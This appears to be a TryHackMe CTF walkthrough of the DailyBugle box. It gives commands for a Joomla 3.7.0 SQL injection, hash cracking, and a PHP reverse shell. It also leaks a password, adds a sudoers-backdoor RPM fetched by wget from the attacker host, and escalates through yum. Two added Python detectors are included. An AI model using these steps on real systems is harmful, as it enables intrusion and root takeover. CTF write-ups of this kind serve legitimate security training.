
DailyBugle TryHackMe Walkthrough

takpa
Introduction

DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and privilege escalation using yum.

Table of Contents

Network Scanning

  • Nmap

Enumeration

  • Discovering administrator directories using robots.txt
  • Enumerating site using joomscan
  • Discovering SQL injection flaw in the current installation

Exploitation

  • Exploiting Joomla v 3.7.0 via SQLi in com_fields
  • Cracking Joomla administrator hashes using john
  • Modifying template to input PHP reverse shell code

Privilege Escalation

  • Discovering other user’s credentials in the configuration file
  • Elevating privileges using yum

Let’s deep dive into this.

Network Scanning

The dedicated IP address of the machine is 10.10.91.172. We’ll run an nmap scan against this IP.

Code:
nmap -sV -sC 10.10.91.172 -Pn



Enumeration

We discovered the existence of a robots file that has an administrator directory.



Upon opening this directory we found out that an instance of Joomla was running on this website.



Thus, we ran joomscan against this website and discovered that version 3.7.0 was running.

Code:
joomscan -u http://10.10.91.172



Right away we looked for public exploits for this installed version using searchsploit and discovered that version 3.7.0 was vulnerable to SQLi via the com_fields component.

Code:
searchsploit joomla 3.7.0
searchsploit -m 42033



Exploitation

As exploit 42033 describes, this SQL injection vulnerability could be exploited with the following command:

Code:
sqlmap -u "http://10.10.91.172/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump-all -p list[fullordering]



However, this scan was taking far too long, so we looked for another script called “Joomblah.py”, which is a PoC for this SQLi vulnerability in Joomla v3.7.0. We downloaded the script, ran it, and found credentials!

Code:
wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
python2.7 joomblah.py http://10.10.91.172
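From the defender's side, the injection above is easy to spot in web server logs: Joomla's list[fullordering] parameter should only ever carry a column name and a sort direction, so anything else in a com_fields request is suspicious. The following is an added example (not part of the original write-up or of any Joomla tooling) that applies that allowlist to constructed Apache access-log lines; the log format and sample values are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Legitimate Joomla list ordering values are "<column> ASC|DESC", e.g. "a.ordering ASC".
BENIGN_ORDERING = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*\s+(ASC|DESC)$", re.IGNORECASE)

# Apache combined log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def inspect_request(path):
    """Return the offending list[fullordering] value when a com_fields request
    carries anything other than a plain column/direction pair, else None."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if qs.get("option", [""])[0] != "com_fields":
        return None
    for value in qs.get("list[fullordering]", []):  # parse_qs already URL-decodes key and value
        value = value.strip()
        if value and not BENIGN_ORDERING.match(value):  # empty means "use the default ordering"
            return value
    return None

def scan_log(lines):
    """Return (client ip, timestamp, suspicious value) for each offending request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = inspect_request(m.group("path"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("ts"), bad))
    return hits

# Constructed sample log lines, not taken from the box.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(1,0x3a,1) HTTP/1.1" 500 412 "-" "sqlmap/1.4"',
    '10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious com_fields ordering: {value!r}")
```

Because the check is an allowlist rather than a signature, it also catches payloads that avoid the updatexml keyword; the real fix is still upgrading Joomla past 3.7.0.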



We had discovered the hash, but to learn its type we googled it and found it was bcrypt.



Thus we saved this hash in a file and used john to crack it.

Code:
cat hash
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash



We now have clear-text credentials. We logged in to the admin panel with them and can see the dashboard!



Like any other CMS, Joomla has templates that run as PHP, so we copied the php-reverse-shell.php code into a template file and clicked on template preview. Before launching the template preview we also set up a netcat listener.

Code:
nc -nlvp 1234



On our listener we see a shell popped up!

Privilege Escalation

Now that we have a working TTY on the victim box, we started looking for ways to escalate privileges. We checked the sudoers file but nothing was found.



After a quick system check and a look at the website’s files, we found a configuration file containing database credentials. The root user had the password: nv5uz9r3ZEDzVjNu

Code:
cd /var/www/html
cat configuration.php



Now, we tried to log in as another existing user, jjameson, using this password, and it worked! We immediately spawned a stable TTY using python. Thereafter, we looked at the sudoers entries and found yum among them.

Code:
su jjameson
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l



Referring to the GTFOBins post here, we can escalate our privileges by creating a custom RPM package. For this, rpm and fpm need to be installed first. Then we copy a command into a shell script. This echo command simply adds my user jjameson to the sudoers file so that any command can be run as root; this is our payload. Finally, we create an RPM package from it using fpm.

Code:
apt install rpm
gem install fpm
echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh
fpm -n root -s dir -t rpm -a all --before-install my.sh .
python3 -m http.server 80
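Both the `sudo -l` finding and the line the payload appends to /etc/sudoers are things a defender can audit for mechanically. The following is an added example (not from the original write-up or from GTFOBins) that parses sudoers-style rules and flags any grant of ALL or of a binary, such as yum, that can run arbitrary commands as the run-as user; the sample sudoers text and the set of flagged binaries are assumptions.

```python
import re
from os.path import basename

# sudo targets that hand the caller an arbitrary command as the run-as user.
# yum is the one on this box (sudo yum localinstall runs the package's scriptlets as root);
# extend the set from GTFOBins to build your own baseline.
ESCAPE_CAPABLE = {"yum", "bash", "sh"}

# user host=(runas) [NOPASSWD:|PASSWD:|SETENV:|NOSETENV:|EXEC:|NOEXEC:] cmd1, cmd2 ...
SUDOERS_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:(?:NO)?(?:PASSWD|SETENV|EXEC):\s*)*)(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return one finding per sudo rule that grants ALL or an escape-capable binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            prog = cmd.split()[0] if cmd else ""
            name = prog if prog == "ALL" else basename(prog)
            if name == "ALL" or name in ESCAPE_CAPABLE:
                findings.append({"who": m.group("who"), "runas": m.group("runas") or "root",
                                 "cmd": cmd, "nopasswd": nopasswd})
    return findings

# Constructed sample, not the box's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults    env_reset
Defaults    secure_path = /sbin:/bin:/usr/sbin:/usr/bin
root     ALL=(ALL)       ALL
%wheel   ALL=(ALL)       ALL
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum, /usr/sbin/service httpd restart
backup   ALL=(ALL) NOPASSWD: /usr/bin/rsync
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Running the audit periodically against /etc/sudoers and /etc/sudoers.d also catches the persistence line the payload writes, since it shows up as a new NOPASSWD ALL grant.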



Now all that’s left to do is to copy this file into the /tmp directory on the victim’s box.

Code:
cd /tmp
wget http://10.17.32.212/root-1.0-1.noarch.rpm



So, we downloaded it and installed it with the yum localinstall command. It ran successfully! We then ran a bash shell with sudo and, as expected, jjameson (my user) ran it as root, and thus privileges were escalated! Finally, we read the congratulatory flag!

Code:
sudo yum localinstall -y root-1.0-1.noarch.rpm
sudo bash
cd /root
cat root.txt



Hence, this is how we rooted this box. Kudos to the author for creating a beginner-friendly box that focuses on real-life and commonly found vulnerabilities. Thanks for reading!

Author: Harshit Rajpal is an InfoSec researcher and left- and right-brain thinker. Contact here